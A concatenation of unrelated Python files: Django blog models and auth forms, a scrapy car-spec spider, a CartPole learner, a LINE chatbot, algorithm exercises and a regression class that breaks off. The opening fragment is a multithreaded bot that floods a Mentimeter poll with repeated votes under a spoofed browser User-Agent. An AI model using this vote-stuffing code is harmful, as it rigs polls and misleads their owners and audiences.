        # urls2 = ['https://www.govote.at/core/votes/'+self.parsedKey] # old
        urls2 = ['https://www.menti.com/core/votes/'+self.parsedKey] # new
        rs = (self.grequests.post(u, json = newdata, headers = headers) for u in urls2)
        requests = self.grequests.map(rs)
        for response in requests:
            content = response
        print(content.content)
        self.printw(content)
    # vote(voteText)
    def threadFun(self, threadName):
        """Worker loop: cycle through voteText until the budget is spent or stopped."""
        # time.sleep(delay)
        # global requestCount
        # global voteIdx
        # global voteText
        # global requestDoneCount
        while self.requestCount < self.numberOfRequests and self.done is False:
            self.requestCount += 1
            # Wrap around the word list.
            if self.voteIdx == len(self.voteText):
                self.voteIdx = 0
            text = self.voteText[self.voteIdx]
            self.voteIdx += 1
            # vote vvv
            self.printw(str(threadName) + " Requests " + str(self.requestCount) + " with " + str(text))
            self.vote(text)
            self.requestDoneCount += 1
            self.updateProgress()
    def startThreads(self):
        """Resolve the poll's public vote key, then launch the worker threads."""
        # It seems the page rejects GET requests that do not identify a User-Agent.
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
        # s = self.requests.get('https://www.menti.com/core/objects/vote_keys/'+self.parsedId, headers=headers) # old
        s = self.requests.get('https://www.menti.com/core/vote-keys/'+self.parsedId+'/series', headers=headers) # new
        string = s.text
        jsondata = self.json.loads(string)
        question = jsondata['questions'][0]
        parsedKey = question['public_key']
        self.parsedKey = parsedKey
        self.printw("Key: " + str(parsedKey))
        for idx in range(self.threads):
            # self._thread.start_new_thread( self.threadFun, ("Thread-" + str(idx), ) )
            # NOTE(review): the lambda captures `idx` late — a thread may
            # report a neighbouring index in its name; the 0.2s stagger
            # usually hides this. Confirm whether names matter.
            t = self.threading.Thread(target=(lambda: self.threadFun("Thread-" + str(idx), )))
            t.start()
            self.time.sleep(0.2)
|
from pymongo import MongoClient
class DB:
    """Thin wrapper around the MongoDB 'hackathon' database."""
    def __init__(self):
        """Connect to the default MongoDB host and cache the reports collection."""
        client = MongoClient()
        self.db = client.get_database("hackathon")
        self.reports = self.db.get_collection("reports")
    def insert_report(self, li_num, _date, _time, img, area):
        """Store one licence-plate report with an initial 'not sent' status."""
        document = {
            'license_number': li_num,
            'date': _date,
            'time': _time,
            'image': img,
            'area': area,
            'status': 'not sent',
        }
        self.reports.insert_one(document)
from django.db import models
from django.contrib.auth.models import User
class Entry(models.Model):
    """A blog entry written by a single author."""
    entry_title = models.CharField(max_length=50)
    entry_text = models.TextField()
    entry_date = models.DateTimeField(auto_now_add=True)  # set once, at creation
    entry_author = models.ForeignKey(User, on_delete=models.CASCADE)  # entries die with their author
    class Meta:
        # Avoid the auto-generated "entrys" in the admin.
        verbose_name_plural = "entries"
    def __str__(self):
        """Display entries by their title."""
        return f'{self.entry_title}'
class Comment(models.Model):
    """A user comment attached to an Entry (reachable as entry.comments)."""
    entry = models.ForeignKey('entries.Entry', on_delete=models.CASCADE, related_name='comments')
    comment_author = models.ForeignKey(User, on_delete=models.CASCADE)
    comment_text = models.TextField()
    comment_date = models.DateTimeField(auto_now_add=True)  # set once, at creation
    def __str__(self):
        """Display comments by their full text."""
        return self.comment_text
# -*- coding: utf-8 -*-
import os
class Website(object):
    """
    Creates the website: an HTML page embedding a Google Maps (v2) view
    with one marker per seismic station.
    """
    def __init__(self, env, *args, **kwargs):
        # `env` supplies the resource directories and the SeisHub connection.
        self.env = env
        self.map_file = os.path.join(self.env.temp_res_dir, 'map.html')
        # Read in the html template.
        f = open(os.path.join(self.env.res_dir, 'upperPart.html'))
        self.upperPart = f.read()
        f.close()
        f = open(os.path.join(self.env.res_dir, 'lowerPart.html'))
        self.lowerPart = f.read()
        f.close()
    def startup(self):
        """Build the map page: stations -> bounds -> marker JS -> html file."""
        # Preprocess stations.
        self.processStations()
        # Get the boundaries.
        self.getBoundaries()
        # Create the middle part of the html.
        self.createMiddle()
        self.createHtml()
    def getBoundaries(self):
        """Compute (min_long, max_long, min_lat, max_lat) over all stations."""
        lats = []
        longs = []
        for station in self.stations:
            info = station[2]
            lats.append(info['latitude'])
            longs.append(info['longitude'])
        # XXX: Ugly hack only for Tobis Computer. Needs a real workaround but
        # should work so far. Maybe change the order of loading the submodules
        # during the startup phase?
        try:
            self.bounds = (min(longs), max(longs), min(lats), max(lats))
        except ValueError:
            # min()/max() on empty lists: no stations at all.
            # NOTE(review): the fallback reads like (lat, lat, long, long),
            # the opposite order of the tuple above — confirm intent.
            self.bounds = (47.0, 49.0, 11.0, 12.0)
    def createHtml(self):
        """Stitch the three template parts together and write map.html."""
        html = self.upperPart + self.middlePart + self.lowerPart
        f = open(self.map_file, 'w')
        f.write(html)
        f.close()
    def processStations(self):
        """Flatten the network dict into [network, station, info] triples.

        Stations with empty info go to self.omitted_stations instead.
        """
        nw_dict = self.env.seishub.networks
        self.stations = []
        self.omitted_stations = []
        networks = nw_dict.keys()
        for network in networks:
            # Skip the metadata entries of the network dictionary.
            if network == 'Server' or network == 'Date':
                continue
            st_dict = nw_dict[network]
            stations = st_dict.keys()
            for station in stations:
                info = st_dict[station]['info']
                if not len(info):
                    self.omitted_stations.append('%s.%s' % (network, station))
                    continue
                self.stations.append([network, station, info])
    def createMiddle(self):
        """Generate the Google Maps JavaScript with one marker per station."""
        # Centre the map on the midpoint of the bounding box.
        center_long = (self.bounds[0] + self.bounds[1]) / 2.0
        center_lat = (self.bounds[2] + self.bounds[3]) / 2.0
        part = 'map.setCenter(new GLatLng(%f, %f), 6);' % (center_lat,
            center_long)
        part += 'map.setUIToDefault();'
        # One marker + click-to-open info window per station.
        for _i, station in enumerate(self.stations):
            info = station[2]
            lat = info['latitude']
            long = info['longitude']
            station_name = info['station_name']
            station_id = '%s' % station[1]
            elevation = info['elevation']
            path = '%s' % station[1]
            part += """
            var point%i = new GPoint(%f,%f);
            var html%i = "<h2>%s</h2> <p>%s<br>Elevation: %f</p>";
            var iconOptions = {};
            iconOptions.width = 40;
            iconOptions.height = 32;
            iconOptions.primaryColor = "#FF0000";
            iconOptions.label = "%s";
            iconOptions.labelSize = 0;
            iconOptions.labelColor = "#000000";
            iconOptions.shape = "roundrect";
            var newIcon = MapIconMaker.createFlatIcon(iconOptions);
            var beck%i = new GMarker(point%i, {icon: newIcon});
            GEvent.addListener(beck%i, "click", function()
            {beck%i.openInfoWindowHtml(html%i)});
            map.addOverlay(beck%i);
            """ % (_i, long, lat, _i, path, station_name,
                elevation, station_id, _i, _i, _i,
                _i, _i, _i)
        self.middlePart = part
|
import gym
import sys
import math
import random
import numpy as np
import matplotlib.pyplot as plt
episodes_nb = 1000

env = gym.make('CartPole-v0')

# Per-episode totals for the final plot.
episode_rewards = np.zeros(episodes_nb)
episode_exploration = np.zeros(episodes_nb)

# Q[state] -> action-value estimates; Z[state] -> eligibility traces.
Q = {}
# Contains the traces for each states
Z = {}

alpha = 0.8            # learning rate
discount_factor = 0.9  # gamma
Lambda = 0.7           # trace-decay parameter

def _state_key(observations):
    """Discretise a continuous observation vector into a coarse string key."""
    return ''.join(str(math.floor(o)) for o in observations)

for episode_i in range(episodes_nb):
    sys.stdout.write("\r" + str(episode_i+1) + "/" + str(episodes_nb))
    sys.stdout.flush()
    state = _state_key(env.reset())
    if state not in Q:
        Q[state] = np.zeros(env.action_space.n)
        Z[state] = np.zeros(env.action_space.n)
    # Eligibility traces belong to a single episode: clear leftovers.
    for s in Z:
        Z[s][:] = 0
    done = False
    while not done:
        # Epsilon-greedy action selection (epsilon = 0.1).
        if random.random() < 0.1:
            episode_exploration[episode_i] += 1
            action = env.action_space.sample()
        else:
            action = np.argmax(Q[state])
        observations, reward, done, _ = env.step(action)
        nextstate = _state_key(observations)
        if nextstate not in Q:
            Q[nextstate] = np.zeros(env.action_space.n)
            Z[nextstate] = np.zeros(env.action_space.n)
        episode_rewards[episode_i] += reward
        # Q-learning TD error. BUG FIX: the bootstrap term is the maximum
        # next-state VALUE (np.max); the original used np.argmax, which
        # mixes an action index into the value estimate.
        target = reward + discount_factor * np.max(Q[nextstate]) - Q[state][action]
        Z[state][action] = 1
        for s in Q:
            Q[s] += alpha * target * Z[s]
            # TD(lambda) traces decay by gamma * lambda per step, not
            # lambda alone as the original had.
            Z[s] *= discount_factor * Lambda
        state = nextstate

plt.plot(
    range(episodes_nb), episode_rewards,
    range(episodes_nb), episode_exploration
)
plt.ylabel('Reward by episode')
plt.show()
|
from __future__ import unicode_literals
import warnings
from django import forms
from django.forms.util import flatatt
from django.template import loader
from django.utils.datastructures import SortedDict
from django.utils.encoding import force_bytes
from django.utils.html import format_html, format_html_join
from django.utils.http import urlsafe_base64_encode
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib.auth import authenticate, get_user_model
from django.contrib.auth.models import User
from django.contrib.auth.hashers import UNUSABLE_PASSWORD_PREFIX, identify_hasher
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.models import get_current_site
from django import forms
class UserCreationForm(forms.ModelForm):
    """
    A form that creates a user, with no privileges, from the given username and
    password.
    """
    error_messages = {
        'duplicate_username': _("A user with that username already exists."),
        'password_mismatch': _("The two password fields didn't match."),
    }
    #first_name = forms.CharField(required=requires_name, max_length=100)
    #last_name = forms.CharField(required=requires_name, max_length=100)
    #email1 = forms.EmailField(label=_("Email"),required=requires_email)
    #email2 = forms.EmailField(label=_("Email confirmation"),required=requires_email)
    username = forms.RegexField(label=_("Username"), max_length=30,
        regex=r'^[\w.@+-]+$',
        error_messages={
            'invalid': _("This value may contain only letters, numbers and "
                "@/./+/-/_ characters.")})
    password = forms.CharField(label=_("Password"),
        widget=forms.PasswordInput)
    password2 = forms.CharField(label=_("Password confirmation"),
        widget=forms.PasswordInput)
    # Bootstrap styling applied to the widgets at class-definition time:
    # placeholders mirror the field labels.
    username.widget.attrs["placeholder"]=username.label;
    password.widget.attrs["placeholder"]=password.label;
    password2.widget.attrs["placeholder"]=password2.label;
    username.widget.attrs["class"]="form-control";
    password.widget.attrs["class"]="form-control";
    password2.widget.attrs["class"]="form-control";
    class Meta:
        model = User
        fields = ("username",)
    def clean_username(self):
        """Reject usernames that already exist with a friendly message."""
        # Since User.username is unique, this check is redundant,
        # but it sets a nicer error message than the ORM. See #13147.
        username = self.cleaned_data["username"]
        try:
            User._default_manager.get(username=username)
        except User.DoesNotExist:
            return username
        raise forms.ValidationError(
            self.error_messages['duplicate_username'],
            code='duplicate_username',
        )
    def clean_password2(self):
        """Validate that both password entries match; return the confirmation."""
        password = self.cleaned_data.get("password")
        password2 = self.cleaned_data.get("password2")
        if password and password2 and password != password2:
            raise forms.ValidationError(
                self.error_messages['password_mismatch'],
                code='password_mismatch',
            )
        return password2
    def save(self, commit=True):
        """Create the user with a hashed password; commit=False defers the DB write."""
        user = super(UserCreationForm, self).save(commit=False)
        user.set_password(self.cleaned_data["password"])
        if commit:
            user.save()
        return user
class AuthenticationForm(forms.Form):
    """
    Base class for authenticating users. Extend this to get a form that accepts
    username/password logins.
    """
    username = forms.CharField(label=_("Username"),max_length=254)
    password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
    # Bootstrap styling applied at class-definition time.
    username.widget.attrs["placeholder"]=username.label;
    password.widget.attrs["placeholder"]=password.label;
    username.widget.attrs["class"]="form-control";
    password.widget.attrs["class"]="form-control";
    error_messages = {
        'invalid_login': _("Please enter a correct %(username)s and password. "
            "Note that both fields may be case-sensitive."),
        'inactive': _("This account is inactive."),
    }
    def __init__(self, request=None, *args, **kwargs):
        """
        The 'request' parameter is set for custom auth use by subclasses.
        The form data comes in via the standard 'data' kwarg.
        """
        self.request = request
        self.user_cache = None
        super(AuthenticationForm, self).__init__(*args, **kwargs)
        # Set the label for the "username" field.
        UserModel = get_user_model()
        self.username_field = UserModel._meta.get_field(UserModel.USERNAME_FIELD)
        if self.fields['username'].label is None:
            self.fields['username'].label = capfirst(self.username_field.verbose_name)
    def clean(self):
        """Authenticate the credentials and cache the user, or raise."""
        username = self.cleaned_data.get('username')
        password = self.cleaned_data.get('password')
        if username and password:
            self.user_cache = authenticate(username=username,
                password=password)
            if self.user_cache is None:
                raise forms.ValidationError(
                    self.error_messages['invalid_login'],
                    code='invalid_login',
                    params={'username': self.username_field.verbose_name},
                )
            elif not self.user_cache.is_active:
                raise forms.ValidationError(
                    self.error_messages['inactive'],
                    code='inactive',
                )
        return self.cleaned_data
    def check_for_test_cookie(self):
        """Deprecated no-op kept for backwards compatibility."""
        warnings.warn("check_for_test_cookie is deprecated; ensure your login "
            "view is CSRF-protected.", DeprecationWarning)
    def get_user_id(self):
        """Return the authenticated user's id, or None before a valid clean()."""
        if self.user_cache:
            return self.user_cache.id
        return None
    def get_user(self):
        """Return the authenticated user object (None if not authenticated)."""
        return self.user_cache
|
##########聊天機器人,聊天功能、關鍵字資料呼叫##########
from .cowpiDB import *
from .crawlerFunc import *
from datetime import datetime, timedelta
import pytz, re, random
####關鍵字功能
def AQI(site):
    """Look up the air-quality index for the given site."""
    result = getAQI(site)
    return result
def Weather(site):
    """Fetch the weather; forecast wording in the query selects forecast mode."""
    PATTERN = '((明|後|大後)[早晚天]|[一下]週|[早晚]上|中午|凌晨|未來)'
    if re.search(PATTERN, site):
        return [getWeather(site, True), 0]
    return [getWeather(site), 1]
def DevinateRes():
    """Return a uniform random fortune index in 0..3.

    random.randrange expresses the intent directly instead of scaling and
    truncating random(); the distribution is the same.
    """
    return random.randrange(4)
####主聊天功能
##學說話
def learn(lineMessage, channelId, e_source):
    """Teach the bot a keyword and its replies from a ';'-separated message."""
    # Normalise full-width semicolons and drop empty segments.
    parts = [seg for seg in lineMessage.replace(";", ";").split(';') if seg != ""]
    # Need at least a command, a keyword and one reply.
    if len(parts) < 3:
        return ["窩聽不懂啦!", 0, 'text']
    insStatement(parts[1], parts[2:], channelId, e_source.type)
    return ["好哦的喵~", 0, 'text']
##忘記
def forget(lineMessage, channelId):
    """Remove taught replies for a keyword from a ';'-separated message."""
    # Normalise full-width semicolons and drop empty segments.
    parts = [seg for seg in lineMessage.replace(";", ";").split(';') if seg != ""]
    # Need at least a command, a keyword and one reply to delete.
    if len(parts) < 3:
        return ["窩聽不懂啦!", 0, 'text']
    delStatement(parts[1], parts[2:], channelId)
    return ["好哦的喵~", 0, 'text']
##壞壞,批次降低資料庫內本次回話的關鍵字權重
def bad(channelId):
    """Punish the latest exchange: lower the weight of its keyword/reply pair."""
    received = queryReceived(channelId, 1)[0][0]
    replied = queryReply(channelId, 1)[0][0]
    adjustPrio(received, replied, -2)
    return ["好哦的喵~", 0, 'text']
##回覆(隨機回覆)
def chat(lineMessage, channelId):
    """Produce a reply; a '牛批貓' or '抽籤' prefix requests a random reply."""
    if lineMessage[0:3] == '牛批貓':
        rand, firstIndex = 1, 3
    elif lineMessage[0:2] == '抽籤':
        rand, firstIndex = 1, 2
    else:
        rand, firstIndex = 0, 0
    response = resStatement(lineMessage[firstIndex:], channelId, rand)
    boolean = 0 if response == "窩聽不懂啦!" else 1
    looks_like_image = (response[0:8] == 'https://'
                        and any(ext in response for ext in ['.jpg', '.jpeg', '.png']))
    type = 'image' if looks_like_image else 'text'
    return [response, boolean, type]
##成功回話時增加權重或加入新詞
def validReply(lineMessage, reply):
    """Reward a successful exchange by bumping the pair's weight by one."""
    adjustPrio(lineMessage, reply, 1)
##齊推
def echo2(lineMessage, channelId):
    """True when the message repeats a recent text message that was not just echoed."""
    recent = queryReceived(channelId, 3)
    repeated = any(lineMessage == rec[0] and rec[1] == 'text' for rec in recent)
    if not repeated:
        return False
    if queryReply(channelId, 1)[0][0] == lineMessage:
        return False
    return True
##你會說什麼
def allLearn(channelId):
    """Dump everything this channel has taught the bot."""
    return allStatement(channelId)
####功能開關
def globaltalk(lineMessage, channelId):
    """Toggle whether replies taught in other channels may be used here.

    BUG FIX: the negative phrases ("不可以說別人教的話", "不能說別人教的話")
    contain the positive phrase "可以說別人教的話" as a substring, so the
    original's positive check fired first and ENABLED global talk on a
    request to disable it. The negative phrases must be tested first.
    """
    if any(s in lineMessage for s in ["不可以說別人教的話", "不能說別人教的話"]):
        editChannelGlobalTalk(channelId, 0)
    elif "可以說別人教的話" in lineMessage:
        editChannelGlobalTalk(channelId, 1)
    return "好哦的喵~"
def mute(lineMessage, channelId):
    """Mute or unmute the bot in this channel based on the command phrase."""
    if any(phrase in lineMessage for phrase in ["牛批貓說話", "牛批貓講話"]):
        editChannelMute(channelId, 0)
    elif any(phrase in lineMessage for phrase in ["牛批貓安靜", "牛批貓閉嘴"]):
        editChannelMute(channelId, 1)
    return "好哦的喵~"
def currentStatus(channelId):
    """Report the channel's global-talk and mute settings, in words and flags."""
    status = queryUser(channelId)
    talk_desc = "所有人教的" if status[2] else "這裡教的"
    mute_desc = "安靜" if status[3] else "可以說話"
    return [talk_desc, mute_desc, status[2], status[3]]
|
from functools import wraps
from database.crud import UserCRUD
from exceptions import UnauthorizedError
from utils import JWT
__all__ = ["authorized"]
def authorized(f):
    """Decorator: resolve the request's JWT into a user, or raise UnauthorizedError.

    On success the user is injected into the handler as kwargs["user"].
    """
    @wraps(f)
    async def decorated_function(request, *args, **kwargs):
        token = request.token
        if token is None:
            raise UnauthorizedError()
        decoded_token = JWT.decode_jwt_token(token)
        if decoded_token is None:
            raise UnauthorizedError()
        auth_user = await UserCRUD.find_by_id(decoded_token.get("user_id"))
        if not auth_user:
            raise UnauthorizedError()
        kwargs["user"] = auth_user
        return await f(request, *args, **kwargs)
    return decorated_function
|
from django.urls import path
from . import views
from django.views.generic import TemplateView
# https://docs.djangoproject.com/en/2.1/topics/http/urls/
urlpatterns = [
    # Dog list and CRUD views.
    path('', views.DogList.as_view(), name='dogs'),
    path('main/create/', views.DogCreate.as_view(), name='dog_create'),
    path('main/<int:pk>/update/', views.DogUpdate.as_view(), name='dog_update'),
    path('main/<int:pk>/delete/', views.DogDelete.as_view(), name='dog_delete'),
    # Lookup-table (dog type) CRUD views.
    path('lookup/', views.TypeView.as_view(), name='type_list'),
    path('lookup/create/', views.TypeCreate.as_view(), name='type_create'),
    path('lookup/<int:pk>/update/', views.TypeUpdate.as_view(), name='type_update'),
    path('lookup/<int:pk>/delete/', views.TypeDelete.as_view(), name='type_delete'),
]
|
# -*- coding: utf-8 -*-
import scrapy
import time
import json
import re
import pymongo
from pandas.core.frame import DataFrame
from lxml import etree
class ChexiuspiderSpider(scrapy.Spider):
    """Crawl chexiu.com: hot brands -> car families -> vehicles -> spec sheets."""
    name = 'chexiu_car'
    allowed_domains = ['chexiu.com']
    start_urls = [f'https://www.chexiu.com/index.php?r=api/car/GetHotBrandWithNoPrice&pagesize=300']

    is_debug = True
    custom_debug_settings = {
        'MYSQL_SERVER': '192.168.1.94',
        'MYSQL_DB': 'chexiu',
        'MYSQL_TABLE': 'chexiu',
        'MONGODB_SERVER': '192.168.1.94',
        'MONGODB_DB': 'chexiu',
        'MONGODB_COLLECTION': 'chexiu_car',
        'CONCURRENT_REQUESTS': 8,
        'DOWNLOAD_DELAY': 0,
        'LOG_LEVEL': 'DEBUG',
    }

    @classmethod
    def update_settings(cls, settings):
        """Apply the debug settings when is_debug is set, else custom_settings."""
        settings.setdict(
            getattr(cls, 'custom_debug_settings' if getattr(cls, 'is_debug', False) else 'custom_settings', None) or {},
            priority='spider')

    def __init__(self, **kwargs):
        super(ChexiuspiderSpider, self).__init__(**kwargs)
        self.counts = 0

    @staticmethod
    def _jsonp_payload(response):
        """Strip the 'callback(...)' JSONP wrapper and parse the JSON inside."""
        return json.loads(response.text.split("callback(")[-1].replace(')', ''))

    def parse(self, response):
        """Brand list (JSONP): queue each brand's search page."""
        for car in self._jsonp_payload(response)["data"]:
            brandname = car["title"]
            cat_id = car["cat_id"]
            url = f'https://sh.chexiu.com/search/list-{cat_id}-0-0-0-0-0-0-1.html'
            yield scrapy.Request(url=url, callback=self.parse_familycars, meta={"info": (cat_id, brandname)})

    def parse_familycars(self, response):
        """Brand page: extract each car family and queue its grouped car list."""
        brand_id, brandname = response.meta.get('info')
        for family_car in response.xpath('//div[@class="m g-fl"]'):
            family_url = family_car.xpath('./a/@href').get()
            family_id = re.sub(r'\D', '', family_url)  # keep only the digits
            familyname = family_car.xpath('.//div[@class="text"]/h3/text()').get()
            url = f'https://www.chexiu.com/index.php?r=site/api/GetCarAllByStyleWithMoreInfoGroupEngin&styleid={family_id}'
            yield scrapy.Request(url=url, callback=self.parse_cars,
                                 meta={"info": (brand_id, brandname, familyname, url)})

    def parse_cars(self, response):
        """Family JSONP: queue the option sheet of every concrete vehicle."""
        brand_id, brandname, familyname, url = response.meta.get('info')
        for engine_list in self._jsonp_payload(response)['data']:
            for car_list in engine_list['carList']:
                family_id = car_list['model_id']
                vehicle_id = car_list['car_id']
                vehicle = car_list['car_name']
                url = f'https://www.chexiu.com/option/{vehicle_id}.html'
                yield scrapy.Request(url=url, callback=self.parse_vehicle,
                                     meta={"info": (brand_id, brandname, family_id, familyname, vehicle_id, vehicle)})

    def parse_vehicle(self, response):
        """Spec sheet: the first two cells of each table row form a name/value pair.

        Optional spec fields default to None via dict.get, replacing the
        original's eleven copy-pasted bare try/except blocks. Factory name
        and guide price stay mandatory: a missing key still raises, as
        before.
        """
        brand_id, brandname, family_id, familyname, vehicle_id, vehicle = response.meta.get('info')
        url = response.url
        info = {}
        for tr in response.xpath('//tr'):
            cells = tr.xpath('.//td[position()<3]//text()').extract()
            # Rows lacking both a name and a value cell are skipped.
            if len(cells) >= 2:
                info[cells[0]] = cells[1]
        guideprice = info['厂商指导价(元)']
        item = {
            'brandname': brandname,
            'brand_id': brand_id,
            'familyname': familyname,
            'family_id': family_id,
            'vehicle': vehicle,
            'vehicle_id': vehicle_id,
            'factoryname': info['厂商'],
            'guideprice': guideprice,
            'engine': info.get('发动机'),
            'transmission': info.get('变速箱'),
            'car_structure': info.get('车身结构'),
            'car_door': info.get('车门数(个)'),
            'car_seat': info.get('座位数(个)'),
            'displacement': info.get('排量(L)'),
            'air_intake': info.get('进气形式'),
            'fuel': info.get('燃料形式'),
            'environmental_protection_standard': info.get('环保标准'),
            'transmission_type': info.get('变速箱类型'),
            'drive_way': info.get('驱动方式'),
            'info': info,
            'url': response.url,
            'grab_time': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
            'status': url + '-' + guideprice,
        }
        yield item
|
x = 5
Name = "Python"

# Prefix check with the dedicated string method.
if Name.startswith("P"):
    print("Start With P")

# Simple membership test.
if "o" in Name:
    print("Yes")

# BUG FIX: the original wrote `if "o" in Name and "Q":`, which tests the
# truthiness of the literal "Q" (always True) instead of membership; both
# letters must actually be present for this branch to print.
if "o" in Name and "Q" in Name:
    print("Yes")
|
import graphene
import schedules.schema
class Query(schedules.schema.Query, graphene.ObjectType):
    """Root GraphQL query type; aggregates the schedules app's query fields."""
    pass
class Mutation(schedules.schema.Mutation, graphene.ObjectType):
    """Root GraphQL mutation type; aggregates the schedules app's mutations."""
    pass
schema = graphene.Schema(query=Query, mutation=Mutation) |
def moreThanHalf(l):
    """Return the majority element of l (the value occurring more than
    len(l)//2 times) via quickselect of the median, or False if the list
    is empty or has no majority element.

    NOTE: partition() reorders l in place, so the caller's list is mutated.
    """
    if len(l) == 0:
        return False
    middle = len(l) >> 1
    start = 0
    end = len(l) - 1
    index = partition(l, start, end)
    while index != middle:
        if index > middle:
            # The median lies left of the pivot: shrink the right bound.
            end = index - 1
        else:
            # BUG FIX: the original set `end = index + 1` here, which
            # searched the wrong half (and could loop forever). When the
            # pivot landed left of the median, advance the LEFT bound.
            start = index + 1
        index = partition(l, start, end)
    result = l[index]
    # The median is only the answer if it truly occurs more than n/2 times.
    if not checkRight(l, result):
        return False
    return result
def partition(l, start, end):
    """Lomuto partition of l[start:end+1] around the pivot l[end].

    Moves the pivot into its final sorted position within the subrange and
    returns that index. Mutates l in place.
    """
    pivot = l[end]
    # boundary = last index currently known to hold a value <= pivot.
    boundary = start - 1
    for scan in range(start, end):
        if l[scan] <= pivot:
            boundary += 1
            l[boundary], l[scan] = l[scan], l[boundary]
    # Drop the pivot just past the <=-pivot region.
    l[boundary + 1], l[end] = l[end], l[boundary + 1]
    return boundary + 1
def checkRight(l, result):
    """Return True iff `result` occurs strictly more than len(l)/2 times."""
    occurrences = l.count(result)
    return occurrences * 2 > len(l)
def moreThanHalf2(l):
    """Boyer-Moore majority vote: return the element occurring more than
    len(l)//2 times, or False when l is empty or no majority exists."""
    if not l:
        return False
    candidate = l[0]
    votes = 1
    for value in l[1:]:
        if votes == 0:
            # Previous candidate cancelled out; adopt the current value.
            candidate = value
            votes = 1
        elif value == candidate:
            votes += 1
        else:
            votes -= 1
    # The surviving candidate is only a true majority after verification.
    if not checkRight(l, candidate):
        return False
    return candidate
if __name__ == '__main__':
    # Exercise both majority-element implementations on sample inputs.
    sample = [1, 2, 3, 2, 2, 2, 5, 4, 2]
    print(moreThanHalf(sample))
    print(moreThanHalf2(sample))
    single = [1]
    print(moreThanHalf(single))
    empty = []
    print(moreThanHalf(empty))
|
class Node:
    """Binary-search-tree node that also tracks its left-subtree size
    (nodeCount) to support order-statistic (k-th smallest) queries."""

    def __init__(self, data):
        self.data = data        # key stored at this node
        self.left = None        # left child (keys < data)
        self.right = None       # right child (keys > data)
        self.nodeCount = 0      # number of nodes inserted into the left subtree
#function to insert elements into the BST
def insert(root, val):
    """Insert val into the BST rooted at `root`; return the (possibly new) root.

    Duplicate keys are ignored at the node where they match. Each descent to
    the left bumps that node's left-subtree counter so kthSmallest can rank
    nodes. NOTE(review): the counter is bumped before a duplicate deeper in
    the left subtree is detected — assumes distinct keys; confirm with callers.
    """
    if root is None:
        return Node(val)
    if root.data == val:
        return root
    if root.data > val:
        root.left = insert(root.left, val)
        root.nodeCount += 1
    else:
        root.right = insert(root.right, val)
    return root
#function to find the kth smallest element
def kthSmallest(root, k):
    """Return the node holding the k-th smallest key (1-based) of the BST
    rooted at `root`, or None when the tree holds fewer than k nodes."""
    if root is None:
        return None
    # The root's 1-based rank within its subtree is its left-subtree size + 1.
    rank = root.nodeCount + 1
    if k == rank:
        return root
    if k < rank:
        return kthSmallest(root.left, k)
    # Skip the left subtree and the root itself when descending right.
    return kthSmallest(root.right, k - rank)
if __name__ == '__main__':
    # Build a sample BST and answer an interactive k-th-smallest query.
    # (Wrapped in a main guard so importing this module no longer blocks
    # on input() — standard script-entry practice.)
    root = Node(5)
    for value in (4, 3, 2, 1, 6, 7, 8):
        insert(root, value)
    k = int(input("Enter k:"))
    ans = kthSmallest(root, k)
    if ans is None:
        # BUG FIX: the original dereferenced ans.data unconditionally and
        # crashed with AttributeError when k exceeded the tree size.
        print("The tree has fewer than", k, "elements.")
    else:
        print("The", k, "th smallest element is:", ans.data)
|
# -*- coding: utf-8 -*-
import numpy as np
import regressionData as rg
import time
import pdb
#-------------------
# クラスの定義始まり
class linearRegression():
    """Least-squares linear regression with an optional Gaussian-kernel
    feature mapping (ridge-regularised in the kernel case)."""
    #------------------------------------
    # 1) Initialise the training data and model parameters.
    # x: training inputs (numpy.array, input dimension x number of samples)
    # y: training outputs (numpy.array, length = number of samples)
    # kernelType: kernel name (string, e.g. "gaussian")
    # kernelParam: kernel hyperparameter (scalar bandwidth)
    def __init__(self, x, y, kernelType="linear", kernelParam=1.0):
        # Store the training data
        self.x = x
        self.y = y
        self.xDim = x.shape[0]   # input dimensionality
        self.dNum = x.shape[1]   # number of training samples
        # Kernel configuration
        self.kernelType = kernelType
        self.kernelParam = kernelParam
    #------------------------------------
    #------------------------------------
    # 2) Optimise the model parameters by ordinary least squares.
    # (A for-loop implementation of the denominator was planned here;
    # this version currently shares the matrix implementation below.)
    # def train(self):
    #     self.w = np.zeros([self.xDim,1])
    #------------------------------------
    #------------------------------------
    def train(self):
        # Append a constant-1 row so the last weight acts as the bias term.
        x = np.insert(self.x,self.x.shape[0],1,axis=0)
        # Normal equations: w = (X X^T)^-1 X y
        l = np.linalg.inv(np.dot(x,x.T))
        r = np.dot(x,self.y.T)
        self.w = np.dot(l,r)
    #------------------------------------
    #------------------------------------
    # 2) Least-squares optimisation (vectorised matrix version).
    def trainMat(self):
        x = np.insert(self.x,self.x.shape[0],1,axis=0)
        l = np.linalg.inv(np.dot(x,x.T))
        r = np.dot(x,self.y.T)
        self.w = np.dot(l,r)
        #self.w = np.zeros([self.xDim,1])
    #------------------------------------
    #------------------------------------
    # 3) Prediction
    # x: input data (input dimension x number of samples)
    def predict(self,x):
        # Add the bias row so x matches the augmented weight vector.
        x1 = np.insert(x,x.shape[0],1,axis=0)
        y = np.dot(self.w.T,x1)
        return y
    #------------------------------------
    #------------------------------------
    # 4) Mean squared loss
    # x: input data (input dimension x number of samples)
    # y: output data (number of samples)
    def loss(self,x,y):
        preY = self.predict(x)
        loss = np.sum((y-preY)*(y-preY))/len(y)
        return loss
    #------------------------------------
    #------------------------------------
    # 6) All pairwise distances between two data collections.
    # x: matrix (dimension x N samples)
    # z: matrix (dimension x M samples)
    def calcDist(self,x,z):
        # Computes the N x M Euclidean distance matrix between every column
        # of x and every column of z via numpy broadcasting.
        #xTile = np.tile(x,(x.shape[0],z.shape[1],1))
        #zTile = np.tile(z.T,(z.shape[0],1,x.shape[1]))
        #dist = abs(xTile.T-zTile.T)
        #return dist
        return np.sqrt(((x[:, :,np.newaxis] - z[:, np.newaxis,:]) ** 2).sum(axis=0))
    #------------------------------------
    #------------------------------------
    # 5) Kernel computation
    # x: matrix of points to evaluate the kernel against (dimension x samples)
    def kernel(self,x):
        # Gram matrix of Gaussian kernel values k(xi, xj) between the
        # training points self.x and the columns of x.
        ker = self.calcDist(self.x,x)
